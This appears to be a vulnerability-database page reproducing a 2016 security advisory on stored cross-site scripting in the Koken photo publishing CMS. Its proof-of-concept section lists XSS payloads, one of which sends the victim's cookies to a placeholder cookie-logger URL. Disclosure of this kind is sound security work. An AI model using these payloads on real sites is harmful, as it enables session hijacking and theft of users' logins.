Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Koken 0.22.7 / 0.22.11 Cross Site Scripting

🗓️ 25 Nov 2016 00:00:00Reported by Taurus OmarType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 46 Views

Koken 0.22.7 & 0.22.11 Multiple Web Vulnerabilities. Allows local attacker to inject script code. Severity level: medium

Code
` ____ _ _____   
| _ \ | | / ____|   
| |_) |_ _| |__ ___| (___ ___ ___   
| _ <| | | | '_ \ / _ \\___ \ / _ \/ __|  
| |_) | |_| | | | | (_) |___) | __/ (__   
|____/ \__,_|_| |_|\___/_____/ \___|\___|  
  
  
Document Title:  
===============  
Koken 0.22.7 & 0.22.11 Multiple Web Vulnerabilities  
  
Credits & Authors:  
==================  
TaurusOmar - @TaurusOmar_ ([email protected]) [taurusomar.buhosec.com]  
  
Release Date:  
=============  
2016-24-11  
  
Product & Service Introduction:  
===============================  
  
Built for photography: Your images are your most important asset. Koken treats them with the attention they deserve by including a full-featured management interface that looks and feels like a desktop application. Work and words, together: Write about portfolio updates, inspiration, or anything that comes to mind. Images, videos, slideshows and content from Flickr, Instagram, Vimeo, SoundCloud and Twitter are a snap to display.  
Live site previewing and editing: Setup your navigation, add pages, and edit your site's color and layout with simple point-and-click controls. No HTML experience required.  
Themes and plugins: Browse, select and install themes and plugins through an integrated store. Everything downloads and installs automatically to your Koken installation.  
  
  
  
Abstract Advisory Information:  
==============================  
An independent researcher discovered multiple vulnerabilities in the official aplication My Koken 0.22.7 & 0.22.11   
  
Vulnerability Disclosure Timeline:  
==================================  
2016-24-11: Public Disclosure  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
Koken - Creative website publishing  
Product: Koken 0.22.7 & 0.22.11   
http://koken.me/  
  
Exploitation Technique:  
=======================  
Local  
  
  
Severity Level:  
===============  
medium  
  
  
Technical Details & Description:  
================================  
An application-side input validation web vulnerability has been discovered in the official Koken 0.22.7   
The vulnerability allows a local attacker to inject own script code as payload to the application-side of the vulnerable service function or module.  
The vulnerability exists in the text box labels links in which injects the code is activated when the web server option to transfer   
  
  
Request Method(s):  
  
[+] Export  
  
Vulnerable Module(s):  
  
[+] Add Label Links  
  
Vulnerable Parameter(s):  
  
[+] Label Link Box  
  
  
Proof of Concept (PoC):  
=======================  
The persistent input validation web vulnerability can be exploited by local attackers with system user account and without user interaction.  
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.  
  
  
1. Add new user o use account admin  
2. Go to path http://tusitio.com/koken/admin/#/site/draft/theme/url:/  
3. On the menu Site > click to add Links/Footer or Links/Primary  
4. In the section Label Links add you script  
4. Successful reproduce of the persistent vulnerability!  
  
Proof of Concept (IMAGES):  
==========================  
  
1. http://i.imgur.com/AAcFkwP.png  
2. http://i.imgur.com/d7LuGLN.png  
  
Vulnerability Code  
=======================  
<a data-bind="css: { 'front-page': $data.front && front }" class="item" href="#"><span class="in"><span data-bind="attr: { class: 'icon16 label-' + ($data.auto && $data.auto === 'rss' ? 'rss' : 'chain') }, text: label" class="icon16 label-chain">VULNERABILITY_CODE</span><span class="front-mark">(front<span class="front-hidden">&nbsp;/&nbsp;hidden</span>)</span></span></a>  
  
PoC_1: Persistent Cross Site Scripting / Path / Footer  
======================================================  
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>  
  
PoC_2: Persistent Cross Site Scripting / Path / Primaty  
=======================================================  
<script>alert(String.fromCharCode(88,83,83))</script>  
  
PoC_3:Hijacking Vulnerability / Path/ Any  
=======================================================  
<script>document.location="http://www.tusitio.com/cookielogger.php?cookie=" + document.cookie;</script>  
  
  
Security Risk:  
==============  
The security risk of the persistent input validation vulnerability in the name value is estimated as medium.   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Nov 2016 00:00Current
7.4High risk
Vulners AI Score7.4
kokenweb vulnerabilityinput validationlocal attackscript injectionsecurity disclosure.
46